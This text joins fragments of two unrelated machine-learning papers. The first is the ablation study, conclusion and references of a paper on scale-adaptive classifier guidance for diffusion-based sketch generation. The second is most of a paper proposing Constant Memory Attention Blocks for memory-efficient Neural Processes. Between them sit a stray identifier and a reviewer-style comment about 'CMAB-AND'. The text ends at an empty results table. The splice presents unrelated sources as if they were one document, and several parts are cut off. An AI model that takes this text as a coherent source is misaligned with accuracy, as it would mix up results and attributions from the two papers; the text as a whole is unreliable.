To verify the effectiveness of each phase, we evaluate the generation results in different scenarios. Specifically, (i) No Warm-up: without performing the warm-up sampling, we directly perform scale adaptive sampling at the beginning, followed by the end-up unconditional denoising till the end; (ii) No Adaptive: we keep all sampling phases unchanged (i.e., the start and end of each sampling stage remain unchanged) but switch the scale adaptive sampling to the vanilla classifier-guided sampling, i.e., applying a constant gradient scale; (iii) Full Guidance: all generation steps are classifier-guided samplings with a constant gradient scale; (iv) No End-up Denoising: sketch generation starts with the warm-up sampling, followed by scale adaptive classifier-guided sampling till the end (i.e., until 250 steps are reached). The results are shown in Table 2b. Compared with our full model, we find that: (i) No Warm-up: both FID and recall get worse without the warm-up sampling, indicating that carrying out unconditional generation at the beginning benefits both fidelity and diversity; (ii) No Adaptive: applying a constant scale (i.e., $s = 0.4$) to the classifier gradients clearly harms the quality of generation, i.e., fidelity (FID); (iii) Full Guidance: merely performing classifier guidance with a constant gradient scale (i.e., $s = 0.4$) simultaneously lowers fidelity and diversity; (iv) No End-up Denoising: both the fidelity and mode coverage of the produced sketches are compromised when maintaining the classifier guidance till the end. This is because overly strong classifier guidance can lead to over-sketching, resulting in declined sample quality and diversity. Moreover, generation is much more expensive (i.e., 5.74 s per sketch) in this case, due to the increased number of sampling steps requiring gradient scale optimization.

**Length of each sampling phase.** To study the influence of varying the length of each sampling phase, we compare the generation results using different configurations of the parameters $\eta$ and $\xi$ in Eq. (5) and Eq. (6). Results are shown in Table 3. We find that most steps are occupied by the end-up denoising sampling, which can be shortened for acceleration, as shown in the last row of Table 3. When increasing $\xi$ and fixing $\eta$, the length of the scale adaptive sampling becomes longer, leading to improved sample quality (i.e., a lower FID score) yet narrowing the mode coverage (i.e., reduced recall).

Table 3: Comparison results when varying the parameters $\eta$ and $\xi$.

| # Steps | $\eta$ | $\xi$ | Warm-up (%) | Adaptive (%) | End-up (%) | FID↓ | Prec↑ | Rec↑ | Speed (s) |
|---------|--------|-------|-------------|--------------|------------|------|-------|------|-----------|
| T=250 | 0.2 | 0.3 | 6.01 | 8.26 | 85.73 | 3.21 | 0.65 | 0.38 | 1.76 |
| | 0.2 | 0.4 | 6.01 | 10.02 | 83.97 | 3.17 | 0.66 | 0.37 | 1.83 |
| | 0.2 | 0.5 | 6.01 | 11.73 | 82.25 | 3.08 | 0.68 | 0.35 | 1.90 |
| | 0.1 | 0.5 | 4.47 | 12.56 | 82.97 | 3.12 | 0.69 | 0.32 | 2.03 |
| | 0.3 | 0.5 | 13.27 | 7.52 | 79.21 | 5.37 | 0.61 | 0.42 | 1.78 |
| | 0.4 | 0.5 | 18.52 | 5.44 | 76.04 | 8.53 | 0.57 | 0.48 | 1.67 |
| T=67 (shortcut) | 0.2 | 0.5 | 15.22 | 40.90 | 43.88 | 3.30 | 0.67 | 0.36 | 0.98 |

Figure 5: Visualization of the residual sketches $x_{rs}$ and the estimated final sketch $\hat{x}_{0|t}$ during scale optimization at (a) early, (b) middle, and (c) late sampling steps. With scale optimization, the residual sketches become more organized and cleaner.
Extending the warm-up sampling shortens the scale adaptive sampling, degrading sample quality but improving diversity. The optimal balance is reached when the warm-up takes about half the number of the adaptive sampling steps.

**Visualization of scale optimization.** To better understand the mechanism of utilizing the scaling indicator as an explicit signal to obtain the optimized gradient scale, we visualize the optimization process along with the corresponding residual sketches $x_{rs}(x_t, s)$ and the estimated final sketch $\hat{x}_{0|t}$. As shown in Figure 5, at the beginning of optimization, the randomly initialized guidance scale $s$ is often mismatched with the scaling indicator $\zeta(x_t)$. The corresponding residual sketch $x_{rs}(x_t, s)$ looks messy and unstructured, implying a less favorable (i.e., too noisy) output sketch $\hat{x}_{0|t}$ under the classifier guidance. Once the gap between $\zeta(x_t)$ and $x_{rs}(x_t, s)$ is closed, the residual sketch becomes cleaner and more organized. As a result, the expected sketches $\hat{x}_{0|t}$ using the optimized scale are painted in a more structured and concise way.

6 CONCLUSION

Raster sketches generated by diffusion models using classifier guidance with a constant scale are sub-optimal: either too sparse to recognize or too densely depicted (i.e., over-sketching). We show that the generation quality can be improved by simply adjusting the guidance scale dynamically at each sampling step, without retraining the model. Concretely, we proposed to optimize the scale according to the predicted generation results at each sampling step, using the developed scale indicator and residual sketch. We observe that the pixel changes during sampling, i.e., the residual sketches, are more organized under our model and located at critical positions that form the sketch object. Injecting unconditional sampling at the beginning and the end of generation is also beneficial. Uniquely, we proposed to assess the generated sketches in terms of expressiveness using the CLIP-Score, which shows that ours can generate sketches containing richer object details.

ACKNOWLEDGMENTS

This work was supported by NSFC under No. 61601042 and the Program for Youth Innovative Research Team of BUPT under No. 2023QNTD02.

REFERENCES

Caroline Chan, Frédo Durand, and Phillip Isola. Learning to generate line drawings that convey geometry and semantics. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 7915–7925, 2022.

Yajing Chen, Shikui Tu, Yuqi Yi, and Lei Xu. Sketch-pix2seq: a model to generate sketches of multiple categories. arXiv preprint arXiv:1709.04121, 2017.

Jooyoung Choi, Sungwon Kim, Yonghyun Jeong, Youngjune Gwon, and Sungroh Yoon. Ilvr: Conditioning method for denoising diffusion probabilistic models. In 2021 IEEE/CVF International Conference on Computer Vision (ICCV), pp. 14347–14356. IEEE Computer Society, 2021.

Ayan Das, Yongxin Yang, Timothy Hospedales, Tao Xiang, and Yi-Zhe Song. Béziersketch: A generative model for scalable vector sketches. In ECCV, 2020.

Ayan Das, Yongxin Yang, Timothy Hospedales, Tao Xiang, and Yi-Zhe Song. Chirodiff: Modelling chirographic data with diffusion models. In The Eleventh International Conference on Learning Representations, 2022.

Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis. Advances in neural information processing systems, 34:8780–8794, 2021.
Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale. arXiv preprint arXiv:2010.11929, 2021. Oran Gafni, Adam Polyak, Oron Ashual, Shelly Sheynin, Devi Parikh, and Yaniv Taigman. Make-a-scene: Scene-based text-to-image generation with human priors. In European Conference on Computer Vision, pp. 89–106. Springer, 2022. Songwei Ge, Vedanuj Goswami, Larry Zitnick, and Devi Parikh. Creative sketch generation. In International Conference on Learning Representations, 2020. David Ha and Douglas Eck. A neural representation of sketch drawings. In International Conference on Learning Representations, 2018. Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. In NeurIPS 2021 Workshop on Deep Generative Models and Downstream Applications, 2021. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. arXiv preprint arXiv:2006.11239, 2020. Tero Karras, Samuli Laine, Miika Aittala, Janne Hellsten, Jaakko Lehtinen, and Timo Aila. Analyzing and improving the image quality of stylegan. arXiv preprint arXiv:1912.04958, 2020. Mingi Kwon, Jaeseok Jeong, and Youngjung Uh. Diffusion models already have a semantic latent space. arXiv preprint arXiv:2210.10960, 2023. Tuomas Kynkäänniemi, Tero Karras, Samuli Laine, Jaakko Lehtinen, and Timo Aila. Improved precision and recall metric for assessing generative models. Advances in Neural Information Processing Systems, 32, 2019. Mengtian Li, Zhe Lin, Radomir Mech, Ersin Yumer, and Deva Ramanan. Photo-sketching: Inferring contour drawings from images. In 2019 IEEE Winter Conference on Applications of Computer Vision (WACV), pp. 1403–1412. IEEE, 2019a. Yijun Li, Chen Fang, Aaron Hertzmann, Eli Shechtman, and Ming-Hsuan Yang. Im2pencil: Controllable pencil illustration from photographs. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 1525–1534, 2019b. Fang Liu, Xiaoming Deng, Yu-Kun Lai, Yong-Jin Liu, Cuixia Ma, and Hongan Wang. Sketchgan: Joint sketch completion and recognition with generative adversarial network. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5830–5839, 2019.
I0gwsdSgsk
The equation at the end of section 3 describing CMAB-AND is rather dense/difficult to read, even given an understanding of each of the components. An explanation of the update mechanism aside from the equation might help clarify.
Memory Efficient Neural Processes via Constant Memory Attention Block

Anonymous authors
Paper under double-blind review

Abstract

Neural Processes (NPs) are popular meta-learning methods for efficiently modelling predictive uncertainty. Recent state-of-the-art methods, however, leverage expensive attention mechanisms, limiting their applications, particularly in low-resource settings. In this work, we propose Constant Memory Attention Block (CMAB), a novel general-purpose attention block that (1) is permutation invariant, (2) computes its output in constant memory, and (3) performs updates in constant computation. Building on CMAB, we propose Constant Memory Attentive Neural Processes (CMANPs), an NP variant which only requires constant memory. Empirically, we show CMANPs achieve state-of-the-art results on popular NP benchmarks (meta-regression and image completion) while being significantly more memory efficient than prior methods.

1 Introduction

Memory efficiency is important for a variety of reasons, for example: (1) Modern hardware, such as GPUs and TPUs, is often memory-constrained for applications, and computing attention mechanisms is memory-intensive. This issue is accentuated now due to the ubiquity of low-memory/compute domains (e.g., IoT devices). (2) Memory efficiency is important in embedded platforms where memory access is energy-intensive. This is particularly important in mobile robots where a limited energy supply needs to be allocated (Li et al., 2022a).

Neural Processes (NPs) have been popular meta-learning methods for efficiently modelling predictive uncertainty. They have been applied to a wide variety of settings such as graph link prediction (Liang & Gao, 2022), continual learning (Requeima et al., 2019), and geographical precipitation modeling (Foong et al., 2020), many of which can have high-dimensional inputs. NPs are particularly useful in low-resource settings due to not requiring retraining from scratch given new data. State-of-the-art methods, however, rely on attention mechanisms which require a substantial amount of memory and do not scale well with the number of tokens (Jha et al., 2022), limiting their applications in low-compute domains (e.g., IoT devices, mobile phones, and other battery-powered devices). For example, Transformer Neural Processes (TNPs) (Nguyen & Grover, 2022) scale quadratically with the size of the context and query dataset. Latent Bottlenecked Attentive Neural Processes (LBANPs) (Feng et al., 2023) have $O(NL)$ complexity, where $N$ is the size of the context dataset and $L$ is a hyperparameter that scales with the difficulty of the task and the size of the context dataset.

As such, in this work, we propose (1) Constant Memory Attention Block (CMAB), a novel general-purpose attention block that (i) is permutation invariant, (ii) computes its output in constant memory, and (iii) performs updates in constant computation. To the best of our knowledge, we are the first to propose an attention mechanism with the aforementioned properties. Due to having memory usage independent of the number of inputs, CMABs naturally scale to large numbers of inputs. Building on CMABs, we propose (2) Constant Memory Attentive Neural Processes (CMANPs). By leveraging the efficiency properties of CMABs, CMANPs (i) are scalable in the number of datapoints and (ii) allow for efficient updates.
Leveraging the efficient updates property, we further introduce an Autoregressive Not-Diagonal extension, namely, CMANP-AND which only requires constant memory unlike the quadratic memory required by all prior Not-Diagonal extensions. In the experiments, CMANPs achieve state-of-the-art results on meta-regression and image completion tasks. We empirically show that CMANPs only require constant memory, making it significantly more efficient than prior state-of-the-art methods. 2 BACKGROUND 2.1 Meta-learning for Predictive Uncertainty Estimation In meta-learning for predictive uncertainty estimation, models are trained on a distribution of tasks $\Omega(\mathcal{T})$ to model a probabilistic predictive distribution. A task $\mathcal{T}$ is a tuple $(\mathcal{X}, \mathcal{Y}, \mathcal{L}, q)$ where $\mathcal{X}, \mathcal{Y}$ are the input and output space respectively, $\mathcal{L}$ is the task-specific loss function, and $q(x,y)$ is the task-specific distribution over data points. During each meta-training iteration, $B$ tasks $\mathcal{T} = \{\mathcal{T}_i\}_{i=1}^{B}$ are sampled from the task distribution $\Omega(\mathcal{T})$. For each task $\mathcal{T}_i \in \mathcal{T}$, a context dataset $\mathcal{D}_C^i = \{(x,y)^{i,j}\}_{j=1}^{N}$ and a target dataset $\mathcal{D}_T^i = \{(x,y)^{i,j}\}_{j=1}^{M}$ are sampled from the task-specific data point distribution $q_{\mathcal{T}_i}$. $N$ is a fixed number of context datapoints and $M$ is a fixed number of target datapoints. The model is adapted using the context dataset. Afterwards, the target dataset is used to evaluate the effectiveness of the adaptation and adjust the adaptation rule accordingly. 2.2 Neural Processes Neural Processes (NPs) are meta-learned models that define a family of conditional distributions. Specifically, NPs condition on an arbitrary amount of context datapoints (labelled datapoints) and make predictions for a batch of target datapoints, while preserving invariance in the ordering of the context dataset. NPs consist of three phases: conditioning, querying, and updating. **Conditioning:** In the conditioning phase, the model encodes the context dataset $\mathcal{D}_C$. Neural Processes [Garnelo et al., 2018b] model functional uncertainty by encoding the context dataset as a Gaussian latent variable: $z_C \sim q(z|\mathcal{D}_C)$ where $q(z|\mathcal{D}_C) = \mathcal{N}(z; \mu_C, \sigma_C^2)$ and $\mu_C, \sigma_C = f_{\text{encoder}}(\mathcal{D}_C)$. Conditional variants [Garnelo et al., 2018a] instead compute a deterministic encoding, i.e., $z_C = f_{\text{encoder}}(\mathcal{D}_C)$. **Querying:** In the querying phase, given target datapoints $x_T$ to make predictions for, the NP models the predictive distribution $p(y_T|x_T, z_C)$. **Updating:** In the updating phase, the model receives new datapoints $\mathcal{D}_U$, and new encodings are computed, i.e., re-computing $z_C$ given $\mathcal{D}_C \leftarrow \mathcal{D}_C \cup \mathcal{D}_U$. The deterministic variant maximizes the log-likelihood directly. 
In contrast, the stochastic variant maximizes an evidence lower bound (ELBO) of the log-likelihood instead:

$$\log p(y_T|x_T, \mathcal{D}_C) \geq \mathbb{E}_{q(z|\mathcal{D}_C \cup \mathcal{D}_T)}[\log p(y_T|x_T, z)] - \text{KL}(q(z|\mathcal{D}_C \cup \mathcal{D}_T)\,||\,p(z|\mathcal{D}_C))$$

3 METHODOLOGY

In this section, we introduce the Constant Memory Attention Block (CMAB), a novel attention mechanism which preserves permutation invariance while only requiring (1) constant memory to compute its output and (2) constant computation to perform updates. Leveraging the efficiency properties of CMAB, we propose Constant Memory Attentive Neural Processes (CMANPs). We also introduce the CMANP-AND (Autoregressive Not-Diagonal) extension, which only requires constant memory, in contrast to the quadratic memory required by prior Not-Diagonal extensions, allowing for scalability to a larger number of datapoints.

### 3.1 Constant Memory Attention Block (CMAB)

The Constant Memory Attention Block (Figure 1) takes as input the input data $\mathcal{D}$ and a set of input latent vectors $L_I$, and outputs a set of output latent vectors $L'_I$. The objective of the block is to encode the information of the input data $\mathcal{D}$ into a fixed-size representation of size $|L_I|$. Each CMAB comprises two cross-attention modules, two self-attention modules, and one set of block-wise latent vectors $L_B$ whose values are learned during training. When stacking CMABs, the output latent vectors of the previous CMAB are fed as the input latent vectors to the next, i.e., $L_I \leftarrow L'_I$. Similar in style to iterative attention (Jaegle et al., 2021), the value of $L_I$ of the first stacked CMAB block is learned. A fundamental difference, however, is that iterative attention can neither compute its output in constant memory nor perform updates in constant computation.

CMAB initially compresses the input data by applying a cross-attention between the input data and the block-wise latent vectors $L_B$. Next, self-attention is used to compute higher-order information:

$$L'_B = \text{SelfAttention}(\text{CrossAttention}(L_B, D))$$

Afterwards, another cross-attention between the input vectors $L_I$ and $L'_B$ is performed, and an additional self-attention is used to further compute higher-order information, resulting in the output vectors $L'_I$:

$$L'_I = \text{SelfAttention}(\text{CrossAttention}(L_I, L'_B))$$

In summary, CMAB (Figure 1) works as follows:

$$\text{CMAB}(L_I, D) = L'_I = \text{SA}(\text{CA}(L_I, \text{SA}(\text{CA}(L_B, D))))$$

where SA represents SelfAttention and CA represents CrossAttention. The two cross-attentions have a linear computational complexity of $\mathcal{O}(|D||L_B|)$ and a constant computational complexity of $\mathcal{O}(|L_B||L_I|)$, respectively. The self-attentions have constant complexities of $\mathcal{O}(|L_B|^2)$ and $\mathcal{O}(|L_I|^2)$. As such, the total computation required to produce the output of the block is $\mathcal{O}(|D||L_B| + |L_B|^2 + |L_B||L_I| + |L_I|^2)$, where the numbers of latents $|L_B|$ and $|L_I|$ are hyperparameter constants which bottleneck the amount of information that can be encoded.
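To make the block structure concrete, a minimal PyTorch sketch of a CMAB is shown below. Layer norms, residual connections, and feed-forward sublayers of a standard attention block are omitted for brevity, so this illustrates only the attention wiring of the equation above.

```python
import torch
import torch.nn as nn

class CMAB(nn.Module):
    """Minimal sketch of a Constant Memory Attention Block."""

    def __init__(self, dim, num_block_latents=128, num_heads=8):
        super().__init__()
        # block-wise latents L_B, learned during training
        self.L_B = nn.Parameter(torch.randn(num_block_latents, dim))
        self.ca_data = nn.MultiheadAttention(dim, num_heads, batch_first=True)
        self.sa_block = nn.MultiheadAttention(dim, num_heads, batch_first=True)
        self.ca_latent = nn.MultiheadAttention(dim, num_heads, batch_first=True)
        self.sa_out = nn.MultiheadAttention(dim, num_heads, batch_first=True)

    def forward(self, L_I, D):
        # L_I: (B, |L_I|, dim) input latents; D: (B, |D|, dim) embedded data
        L_B = self.L_B.unsqueeze(0).expand(D.size(0), -1, -1)
        h, _ = self.ca_data(L_B, D, D)       # CA(L_B, D): compress the data
        h, _ = self.sa_block(h, h, h)        # SA(...): higher-order info, L'_B
        out, _ = self.ca_latent(L_I, h, h)   # CA(L_I, L'_B)
        out, _ = self.sa_out(out, out, out)  # SA(...): output latents L'_I
        return out
```

Stacking then simply chains calls, feeding each block's output latents as the next block's input latents.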
### 3.1.1 Constant Computation Updates

A significant advantage of CMABs is that, when given new inputs, CMABs can compute the updated output in constant computation per new datapoint. In contrast, a transformer block would require re-computing its output from scratch, requiring quadratic computation to perform a similar update. Having previously computed $\text{CMAB}(L_I, D)$ and given new datapoints $D_U$ (e.g., from sequential settings such as contextual bandits), $\text{CMAB}(L_I, D \cup D_U)$ can be computed in $\mathcal{O}(|D_U|)$, i.e., a constant amount of computation per new datapoint.

**Proof Outline:** Since $|L_B|$ and $|L_I|$ are constants (hyperparameters), CMAB's complexity is constant except for the contribution of the first attention block, $\text{CrossAttention}(L_B, D)$, which has a complexity of $\mathcal{O}(|D||L_B|)$. As such, to achieve constant computation updates, it suffices that the output of this cross-attention can be updated in constant computation per datapoint. Simplified, $\text{CrossAttention}(L_B, D)$ is computed as follows:

$$\text{CrossAttention}(L_B, D) = \text{softmax}(QK^T)V$$

where $K$ and $V$ are the key and value matrices representing the embeddings of the input data $D$, and $Q$ is the query matrix representing the embeddings of the block-wise latents $L_B$. When an update with $|D_U|$ new datapoints occurs, $|D_U|$ rows are added to the key and value matrices. Crucially, the query matrix is constant, because the block-wise latent vectors $L_B$ are a fixed set of latent vectors whose values are learned.¹ As a result, the output of the cross-attention can be computed via a rolling average in $\mathcal{O}(|D_U|)$. A formal proof and description of this process is included in the Appendix. As a result, we have the following update function:

$$\text{CrossAttention}(L_B, D \cup D_U) = \text{UPDATE}(D_U, \text{CrossAttention}(L_B, D))$$

where the UPDATE operation has a complexity of $\mathcal{O}(|D_U|)$. Each of the remaining self-attention and cross-attention blocks only requires constant computation. As such, CMAB can compute its updated output in $\mathcal{O}(|D_U|)$, i.e., a constant amount of computation per new datapoint.

¹ CMABs also allow for efficient removal of datapoints (and consequently edits as well) from the input data, but this is outside the scope of this work.

### 3.1.2 Computing Output in Constant Memory

Leveraging the efficient updates property, CMABs can compute their output in constant memory regardless of the number of inputs. Naive computation of the output of CMAB requires non-constant memory, because $\text{CrossAttention}(L_B, D)$ has a linear memory complexity of $\mathcal{O}(|D||L_B|)$. To achieve constant memory computation, we split the input data $D$ into $\lceil |D|/b_C \rceil$ batches of datapoints of size up to $b_C$ (a pre-specified constant), i.e., $D = \bigcup_{i=1}^{\lceil |D|/b_C \rceil} D_i$. Instead of computing the output at once, it is equivalent to performing an update $\lceil |D|/b_C \rceil - 1$ times:

$$\text{CA}(L_B, D) = \text{UPDATE}(D_1, \text{UPDATE}(D_2, \ldots \text{UPDATE}(D_{\lceil |D|/b_C \rceil - 1}, \text{CA}(L_B, D_{\lceil |D|/b_C \rceil}))))$$

Computing $\text{CrossAttention}(L_B, D_{\lceil |D|/b_C \rceil})$ requires $\mathcal{O}(b_C|L_B|)$, i.e., constant memory, since $b_C$ and $|L_B|$ are both constants. After its computation, the memory can be freed, so that each of the subsequent UPDATE operations can re-use the memory space one by one. Each of the update operations also costs $\mathcal{O}(b_C|L_B|)$ constant memory, resulting in $\text{CrossAttention}(L_B, D)$ needing only $\mathcal{O}(b_C|L_B|)$ memory in total. As a result, CMAB's output can be computed in constant memory.
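The rolling update of the first cross-attention can be sketched as a streaming softmax with fixed queries. The running-max rescaling below is a standard trick for numerical stability and is our assumption; the paper defers the formal construction to its appendix.

```python
import torch

class RollingCrossAttention:
    """Streaming computation of softmax(Q K^T) V with fixed queries Q
    (the block-wise latents), as used by the UPDATE operation above."""

    def __init__(self, Q):
        self.Q = Q                                           # (|L_B|, d), never changes
        self.m = torch.full((Q.size(0), 1), float("-inf"))   # running logit max
        self.num = None                                      # running sum of e^{qk} v
        self.den = torch.zeros(Q.size(0), 1)                 # running sum of e^{qk}

    def update(self, K_new, V_new):
        logits = self.Q @ K_new.t()                          # (|L_B|, |D_U|)
        m_new = torch.maximum(self.m, logits.max(dim=1, keepdim=True).values)
        rescale = torch.exp(self.m - m_new)                  # re-normalize old sums
        w = torch.exp(logits - m_new)
        if self.num is None:
            self.num = torch.zeros(self.Q.size(0), V_new.size(1))
        self.num = self.num * rescale + w @ V_new
        self.den = self.den * rescale + w.sum(dim=1, keepdim=True)
        self.m = m_new
        return self.num / self.den                           # CrossAttention(L_B, D) so far
```

Calling `update` once per batch of at most $b_C$ datapoints, and discarding each batch's keys and values afterwards, yields exactly the constant-memory computation of Section 3.1.2.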
### 3.1.3 Additional Useful Properties

Since CMABs leverage only cross-attention and self-attention modules, both of which are permutation invariant, CMABs are also permutation invariant by nature. Similar to transformers, CMABs can leverage positional encodings for sequence and temporal data. Another advantage of CMABs over prior attention works is that the original input data $D$ does not need to be stored when performing updates, meaning the model has privacy-preserving properties and is applicable to streaming-data settings where data cannot be stored. CMABs only require (1) constant memory regardless of the number of inputs, making them particularly useful for scaling to large amounts of inputs, and (2) constant computation to perform updates, making them particularly useful for settings where the data comes in a stream and the dataset needs to be updated (e.g., contextual bandits, Bayesian optimization, active learning, and temporal data). The efficiency of CMABs allows modern attention models to be highly accessible for low-compute domains (e.g., IoT devices). To showcase CMABs' general applicability, we include in the Appendix a model for next-event prediction (Temporal Point Processes) that also leverages CMABs.

### 3.2 Constant Memory Attentive Neural Process (CMANP)

In this section, we introduce Constant Memory Attentive Neural Processes (CMANPs), a memory-efficient variant of Neural Processes (Figure 2) based on CMAB blocks. The conditioning, querying, and updating phases in CMANPs work as follows:

**Conditioning Phase:** In the conditioning phase, the CMAB blocks encode the context dataset into a set of latent vectors $L_i$. The first block takes as input a set of meta-learned latent vectors $L_0$ (i.e., $L_I$ in CMABs) and the context dataset $D_C$, and outputs a set of encodings $L_1$ (i.e., $L'_I$ in CMABs). The output latents of each block are passed as the input latents to the next CMAB block:

$$L_i = \text{CMAB}(L_{i-1}, D_C)$$

Since CMAB can compute its output in constant memory, CMANPs can also perform this conditioning phase in constant memory.

Figure 2: Constant Memory Attentive Neural Processes.

Table 1: Comparison of memory complexities of top-performing Neural Processes with respect to the number of context datapoints $|\mathcal{D}_C|$, the number of target datapoints in a batch $M$, and the number of new datapoints in an update $|\mathcal{D}_U|$. (Green) checkmarks represent requiring constant memory, (orange) half checkmarks represent requiring linear memory, and (red) Xs represent requiring quadratic or more memory. A larger table with all baselines is included in the Appendix.

| In Terms of | Conditioning | Querying | Updating |
|-------------|--------------|----------|----------|
| TNP-D | N/A | X | N/A |
| TNP-ND | N/A | X | N/A |
| EQTNP | X | ✓ | X |
| LBANP | ✓ | ✓ | ✓ |
| LBANP-ND | ✓ | ✓ | ✓ |
| CMANP (Ours) | ✓ | ✓ | ✓ |
| CMANP-AND (Ours) | ✓ | ✓ | ✓ |

**Querying Phase:** In the querying phase, the deployed model retrieves information from the fixed-size outputs of the CMAB blocks ($L_i$) to make predictions for the query datapoints ($X_{query}$). Beginning with $X^0_{query} \leftarrow X_{query}$, when making a prediction for the query datapoints $X_{query}$, information is retrieved via cross-attention:

$$X^i_{query} = \text{CrossAttention}(X^{i-1}_{query}, L_i)$$

**Update Phase:** In the update phase, the NP receives a batch of new datapoints $\mathcal{D}_U$ to include in the context dataset.
**Update Phase:** In the update phase, the NP receives a batch of new datapoints $\mathcal{D}_U$ to include in the context dataset. CMANPs leverage the efficient update mechanism of CMABs to achieve efficient updates (constant per datapoint) to the context dataset, i.e., computing updated latents $L^{\text{updated}}_i$ given the new datapoints $\mathcal{D}_U$. Beginning with $L^{\text{updated}}_0 \leftarrow L_0$, the CMAB blocks are updated sequentially, using the updated output of the previous CMAB block as follows:
$$L^{\text{updated}}_i = \text{CMAB}(L^{\text{updated}}_{i-1}, \mathcal{D}_C \cup \mathcal{D}_U)$$
Since CMAB can compute its output and perform updates in constant memory irrespective of the number of context datapoints, CMANPs can also compute their output and perform updates in constant memory. In Table 1, we compare the memory complexities of top-performing Neural Processes, showcasing the efficiency gains of CMANPs over prior state-of-the-art methods.

### 3.2.1 Autoregressive Not-Diagonal Extension

In many settings where NPs are applied, such as image completion, the target datapoints are correlated and their predictive distributions are evaluated jointly. As such, prior works (Nguyen & Grover, 2022; Feng et al., 2023) have proposed a Not-Diagonal variant of NPs which predicts the mean and a full covariance matrix, typically via a low-rank approximation. This is in contrast to the vanilla (Diagonal) variants, which predict the mean and a diagonal covariance matrix. Not-Diagonal methods, however, are not scalable, requiring quadratic memory in the number of target datapoints due to outputting a full covariance matrix.

Leveraging the efficient-updates property of CMABs, we propose CMANP-AND (Autoregressive Not-Diagonal). During training, CMANP-AND follows the framework of prior Not-Diagonal variants. When deployed, the model is treated as an autoregressive model that makes predictions in blocks of $b_Q$ datapoints. For each block prediction, a mean and full covariance matrix are computed via a low-rank approximation. Sampled predictions of prior blocks are used to make predictions for later blocks. The first block is sampled as follows:
$$\hat{y}_{N+1:N+b_Q} \sim \mathcal{N}(\mu_\theta(D^0_C, x_{N+1:N+b_Q}), \Sigma_\theta(D^0_C, x_{N+1:N+b_Q}))$$
Afterwards, by leveraging the efficient update mechanism, CMANP-AND performs an update using the predictions $\{(x_i, \hat{y}_i)\}_{i=N+1}^{N+b_Q}$ as new context datapoints, meaning that CMANP-AND is now conditioned on a new context dataset $D^1_C$ where $D^1_C = D^0_C \cup \{(x_i, \hat{y}_i)\}_{i=N+1}^{N+b_Q}$. Formally, the general formulation is as follows:
$$\hat{y}_{N+kb_Q+1:N+(k+1)b_Q} \sim \mathcal{N}(\mu_\theta(D^k_C, x_{N+kb_Q+1:N+(k+1)b_Q}), \Sigma_\theta(D^k_C, x_{N+kb_Q+1:N+(k+1)b_Q}))$$
where $k$ is the number of blocks already processed and $D^k_C = \{(x_i, y_i)\}_{i=1}^{N} \cup \{(x_i, \hat{y}_i)\}_{i=N+1}^{N+kb_Q}$ is the context dataset.

The hyperparameter $b_Q$ controls (1) the computational cost of the model in terms of memory and sequential computation length and (2) the performance of the model. Lower values of $b_Q$ allow for modelling more complex distributions, offering better performance but requiring more forward passes of the model. Since $b_Q$ is a constant, this Autoregressive Not-Diagonal extension makes predictions in constant memory, unlike prior Not-Diagonal variants, which were quadratic in memory. As such, CMANP-AND can scale to a larger number of datapoints than prior methods (LBANP-ND and TNP-ND). The big-$\mathcal{O}$ complexity analysis is included in the Appendix.
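At deployment, the autoregressive loop can be sketched in a few lines. We assume a hypothetical `model` that returns a block mean and full covariance and exposes an `update` hook that folds sampled predictions back into the conditioned state via the constant-computation CMAB update; these names are illustrative only.

```python
import numpy as np

def cmanp_and_sample(model, state, x_query, b_q=5, rng=None):
    """Sample targets block-by-block, conditioning on earlier sampled blocks."""
    rng = rng or np.random.default_rng()
    samples = []
    for start in range(0, len(x_query), b_q):
        x_block = x_query[start:start + b_q]
        mu, cov = model.predict(state, x_block)      # low-rank full covariance
        y_block = rng.multivariate_normal(mu, cov)   # joint sample for the block
        samples.append(y_block)
        # Constant-computation update: the sampled block joins the context D_C^k.
        state = model.update(state, x_block, y_block)
    return np.concatenate(samples)
```

Smaller `b_q` means more sequential model calls but a more flexible joint predictive distribution, which matches the trade-off reported in the analysis section.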
4 EXPERIMENTS

In this section, we evaluate the empirical performance of CMANPs and provide an analysis showcasing their versatility.² To do so, we compare CMANPs against a large variety of members of the Neural Process family on standard NP benchmarks: image completion and meta-regression. Specifically, we compare against Conditional Neural Processes (CNPs) (Garnelo et al., 2018a), Neural Processes (NPs) (Garnelo et al., 2018b), Bootstrapping Neural Processes (BNPs) (Lee et al., 2020), (Conditional) Attentive Neural Processes ((C)ANPs) (Kim et al., 2019), Bootstrapping Attentive Neural Processes (BANPs) (Lee et al., 2020), Latent Bottlenecked Attentive Neural Processes (LBANPs) (Feng et al., 2023), and Transformer Neural Processes (TNPs) (Nguyen & Grover, 2022). We also compare against the Not-Diagonal variants of the state-of-the-art methods (LBANP-ND and TNP-ND). Notably, our proposed CMANPs leverage CMABs, LBANPs (Feng et al., 2023) leverage iterative attention (Jaegle et al., 2021), and TNPs leverage transformers (Vaswani et al., 2017).

For consistency, we set the number of latents (i.e., the bottleneck size) $|L_I| = |L_B| = 128$ across all experiments. We also set $b_Q = 5$. To fairly compare iterative attention and CMABs, we report results for LBANPs with the same sized bottleneck (i.e., number of latents $L = 128$) as CMANPs across all experiments. We later show in the analysis section (Section 4.2.1) that the reported performance of CMANPs can be further improved by increasing the number of latents ($|L_I|$ or $|L_B|$) and decreasing the prediction block size $b_Q$.

Due to space limitations, several details are included in the appendix: (1) experiments on contextual multi-armed bandits in a setting where data comes in a stream; (2) implementation details such as hyperparameters and their selection; and (3) an application of CMABs to Temporal Point Processes, showing CMABs' general applicability.

² The code will be released upon acceptance.

4.1 IMAGE COMPLETION

We consider the image completion setting with two datasets: EMNIST (Cohen et al., 2017) and CelebA (Liu et al., 2015). The model is given a set of pixel values of an image and aims to predict the remaining pixels of the image.

| Method | CelebA 32x32 | CelebA 64x64 | CelebA 128x128 | EMNIST Seen (0-9) | EMNIST Unseen (10-46) |
|------------|--------------|--------------|----------------|-------------------|-----------------------|
